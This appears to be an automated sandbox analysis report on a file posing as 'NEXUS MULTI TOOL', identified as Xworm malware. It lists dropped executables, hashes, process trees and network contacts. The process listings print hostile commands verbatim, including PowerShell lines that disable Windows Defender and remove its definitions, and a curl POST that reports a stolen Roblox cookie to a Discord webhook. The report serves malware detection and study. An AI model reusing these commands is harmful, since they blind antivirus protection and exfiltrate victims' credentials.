Analysis Overview
SHA256
59529f95dc9a1b17af941ecf2543d611dbbf658a816966748d1959c88adf3512
Threat Level: Known bad
The file NEXUS MULTI TOOL COMEBACK.exe was found to be: Known bad.
Malicious Activity Summary
Xworm family
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
UPX packed file
Enumerates processes with tasklist
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 15:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 15:37
Reported
2024-11-09 15:38
Platform
win7-20240903-en
Max time kernel
24s
Max time network
19s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe
"C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe"
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
"C:\Users\Admin\AppData\Roaming\ASFASFAF.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe"
C:\Users\Admin\AppData\Roaming\12usbb.exe
"C:\Users\Admin\AppData\Roaming\12usbb.exe"
C:\Users\Admin\AppData\Roaming\12usb.exe
"C:\Users\Admin\AppData\Roaming\12usb.exe"
C:\Users\Admin\AppData\Roaming\12b.exe
"C:\Users\Admin\AppData\Roaming\12b.exe"
C:\Users\Admin\AppData\Roaming\12a.exe
"C:\Users\Admin\AppData\Roaming\12a.exe"
C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat" "
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\where.exe
where curl
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/2756-0-0x000007FEF6403000-0x000007FEF6404000-memory.dmp
memory/2756-1-0x0000000000080000-0x0000000000A30000-memory.dmp
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
| MD5 | af18528c77f182540fda6cbbbf3a83ef |
| SHA1 | a99236fa135bfeba3dfeb7c700ee3b3856641213 |
| SHA256 | 3f471dc6372f5b012774fb7e3d22c45200368cf58e4e21f4274b0394edd97367 |
| SHA512 | cce7ac659ea137ffc2d2c125ee0b04c4910dfdeda79432eeaf91bb89f19f0a3006c2369b32a202bba56cf44d893a3426d3f23d7c3bf85292df694078f7cebf2c |
memory/2812-7-0x0000000000A00000-0x0000000000A16000-memory.dmp
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
| MD5 | 001f0331b217d54a4db2f5e1b724b465 |
| SHA1 | 75e3bf5ff0ce2fc0054cb60f546616434e847d15 |
| SHA256 | c696f10a59baf7856752071f854a082ffa1aaf41114a193e045aed22fd455511 |
| SHA512 | 893e9eac798dadc61564dfc3abefc0fbb0f681669efd06ac5b314d2a20c055a06049c7e7b8ec6d767254405c88794699761c2c6b4ad3adf80de5798a964d6afc |
memory/2812-13-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
memory/2932-14-0x0000000000180000-0x0000000000AD8000-memory.dmp
C:\Users\Admin\AppData\Roaming\12usbb.exe
| MD5 | f97be9836f9c32828bf064154ec2a827 |
| SHA1 | 04802f2c3962a6d19f97a288a836501477f43752 |
| SHA256 | 6c1fd1a9133f5922eb5c8a9051faf9021d0bfb8957bf38fceae3c663601cfc31 |
| SHA512 | 789e47895233ab3f502b2ea4df1598e6a71a997e52d932f34417e680a3e58e59ffc443b8b236055adb63f232bce38e58f3bb2981719de0bef31a4b4d461fbccc |
memory/2652-27-0x0000000000050000-0x0000000000068000-memory.dmp
C:\Users\Admin\AppData\Roaming\12usb.exe
| MD5 | 1a3dc739a65084d93c9a712ff05cc030 |
| SHA1 | 00c78706bb006a064b5aeadb3519b83b0e33fbdb |
| SHA256 | c678a8f61ccd104336e195e5021a798e85472f50eb36c69663fe06a4e666d4d3 |
| SHA512 | 2013594f81fce4539845a9deadf41fc624e96b787b2bdd0fd267f25fdd893661b5b1d44b7f888191a76bc4fc74f499b7cb139a195c18ab7f39cfb703db54a5a6 |
memory/2608-32-0x0000000000F10000-0x0000000000F2C000-memory.dmp
C:\Users\Admin\AppData\Roaming\12b.exe
| MD5 | ae771226292b612caa758e2e41914162 |
| SHA1 | 9b3ba9a6fcea6900f12c4fb83c3e1b2ef0223d35 |
| SHA256 | eed2208be3da34b0ec97617795da28f116142baee971818257b456b3ad8461bd |
| SHA512 | 380708c08299991e39230948d9bf73cdec3d5e737b8621ef58cf1f6143d349b0acf0af94779a3fcdd3ad6caff2483856368956ab1da6088d190104f122752dee |
memory/2216-34-0x00000000012B0000-0x00000000012CA000-memory.dmp
C:\Users\Admin\AppData\Roaming\12a.exe
| MD5 | 4e64f65f02f978039dc9f4876c2fdeb8 |
| SHA1 | 41645171376ebb64609b839abfb3a74a02cb76b3 |
| SHA256 | 9748db0c2c978baa0b06fe04f89095e946ee374971fbc9b02516fcdf89ebd84d |
| SHA512 | f2aa7eb3aa37a3bd036d912384a1b4c7e77e963cdee3bb1dfdcc70e852e75090e3344d83543b7971d7da3bd89096205cd13b91f38c1e3882f4f339e12b90d9a4 |
C:\Users\Admin\AppData\Roaming\12.exe
| MD5 | f6e8c50ec340112a5af6743fef26caf0 |
| SHA1 | 7f4b761c19a5c04b11f509d8d72cb4baed70851b |
| SHA256 | c1d3f338c8c1113b31487a7c1a9aa2bc7656031f117a77eaf95b78859a6d2a52 |
| SHA512 | c9fb14e0e6e14480577aeb1f3126c7a127fc579fa9ea00fb65c11f0ea3a5d762416ec35b0e5da0aafa8916204c82397a9ba5893b55ed49a94605a7f4310ebfb8 |
memory/2168-43-0x0000000000320000-0x000000000033C000-memory.dmp
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
| MD5 | 071ebbf91aaef883b9b251a11d0baaf0 |
| SHA1 | 24ecbab727858c1c20766774c018d10ee2f1362e |
| SHA256 | 558b5b9d5e3cbafe1b4691637755e9b1d89c0469de05385e1a23fe1ac25c9ad1 |
| SHA512 | b825edbbf1164395a210671641aa44420e217420b3ead7ab46cf7225b7a349209a91787f69630f39e8aca549e26d1449d88ea9b4f539400ca9d8f0edc79b2b7a |
memory/528-50-0x00000000009E0000-0x00000000009FA000-memory.dmp
memory/1436-49-0x0000000001110000-0x000000000113C000-memory.dmp
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
| MD5 | cf3cdbd223d377903322e1f993509d03 |
| SHA1 | c76e2c6001567498825e6d3a4741d5cb48f7eb4b |
| SHA256 | 93ebe1f8e297cba6476ac75133bd49a973126e5eddf17907e28f05da049d7f26 |
| SHA512 | 98a89d1ddb1250e5e7d1003ee095b58bbd6ebf6521d18670b4587373222640b2eb5b2c47731aae5d1100e3cc53ec7a76f1c9e50f9cb841659f4dbe4c365854da |
memory/2648-56-0x00000000012B0000-0x0000000001B38000-memory.dmp
C:\Users\Admin\AppData\Roaming\System User.exe
| MD5 | 6ca96db4e9ba4644886446eb96499093 |
| SHA1 | de67d2c3ce25a498ed6e4fe3a2c78b777da5a4c8 |
| SHA256 | c1567cafc453d946b3fa03e7ca8e7338cf353c8724d46b1e954aee245c1c32cf |
| SHA512 | 45de4658248aec9833fb97e18f5998b137b2a77c0d57b3e39aa952b5c17f1fc81b5ceacb39a5f6ab731e1156435605746933cd49b280c96af428f378de1bc886 |
C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat
| MD5 | a009efb7ec8161a79566214938b510b9 |
| SHA1 | 29615bff535c78d75e60c438d0e073393bb92169 |
| SHA256 | 8414c53566218e87e145cb41419c5c630885e8cb77bf8475268ad6dad409ce42 |
| SHA512 | b4c59ec289e8a77c5e7740602f80154c7455d1181c28da36f24db2da632012c4e2d39e213193523514db4839f49307630b11fd29833b181708c61b850ca1e1a6 |
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | e48808df8db78cbde11b3d92c0e6d3fa |
| SHA1 | b95c55735333b86ef43d12c4ff9f1f5c2b5eeda6 |
| SHA256 | 932c247dead183254ef8e17f7dfb028068b8ebfa5bad7a32b5c035855132e2fe |
| SHA512 | 3743bcb5853548265aa078a7526018ab084b8ff9d377d180e6c35cc1599c1e2f15088e4edf98d1ab77ed6d4aed28f1f1fa7d42a6c010dee7272227058909a7c8 |
memory/1572-85-0x0000000000FB0000-0x0000000000FDC000-memory.dmp
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | 223c162111dfc3bded4c899f2de073f5 |
| SHA1 | 098976f0ca4d17836a585ce26a16922e4bff7423 |
| SHA256 | 22bf2888b0a8ac7f3463540e8e0d7c33eed99397d86ef5ab3efddf7f911a2884 |
| SHA512 | a7b328233880c54d16ea89248d738c6fcca5d894694feb5ff416c94b4def3fd92f1c1a3b4513a06053105629584942e078ed3af7a611d0fc8944c9d71aad81cc |
C:\Users\Admin\AppData\Roaming\1.exe
| MD5 | c0e07ab470ece01eccc13e8baffc7244 |
| SHA1 | a554efbd2287bd5b3d1b826d1cd4353e794db346 |
| SHA256 | 3b217082d0487f8e5b07d7265984a93f673ddaba8e091ba85d192738efde0e1a |
| SHA512 | 3cc8dce7c4ce8154579cdc1c42d2afeefa3bbc684627e6f59de34428b09d03a181ef91e5e4f45308bce6b33391228985aa8eb1953ec84d6e29323c25c13a2a0c |
memory/2984-102-0x0000000000280000-0x00000000002AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI27962\python313.dll
| MD5 | 6ef5d2f77064df6f2f47af7ee4d44f0f |
| SHA1 | 0003946454b107874aa31839d41edcda1c77b0af |
| SHA256 | ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367 |
| SHA512 | 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266 |
memory/2848-89-0x0000000000140000-0x0000000000168000-memory.dmp
memory/2088-117-0x000007FEF2F50000-0x000007FEF35B3000-memory.dmp
memory/2812-118-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
memory/2812-119-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 15:37
Reported
2024-11-09 15:40
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
148s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe
"C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe"
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
"C:\Users\Admin\AppData\Roaming\ASFASFAF.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe"
C:\Users\Admin\AppData\Roaming\12usbb.exe
"C:\Users\Admin\AppData\Roaming\12usbb.exe"
C:\Users\Admin\AppData\Roaming\12usb.exe
"C:\Users\Admin\AppData\Roaming\12usb.exe"
C:\Users\Admin\AppData\Roaming\12b.exe
"C:\Users\Admin\AppData\Roaming\12b.exe"
C:\Users\Admin\AppData\Roaming\12a.exe
"C:\Users\Admin\AppData\Roaming\12a.exe"
C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat" "
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\where.exe
where curl
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 592 -ip 592
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\curl.exe
curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"@everyone @here Your Roblox Cookie is ready: 1234\"}" "https://discordapp.com/api/webhooks/1294585526804025436/ok3FvyE5NZ7ZDo4imAca_NqcAQYVuI-C6l2HJn4ILFCEdP9y9WgkKrCuwarM8seLpUDn"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-h6qso.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
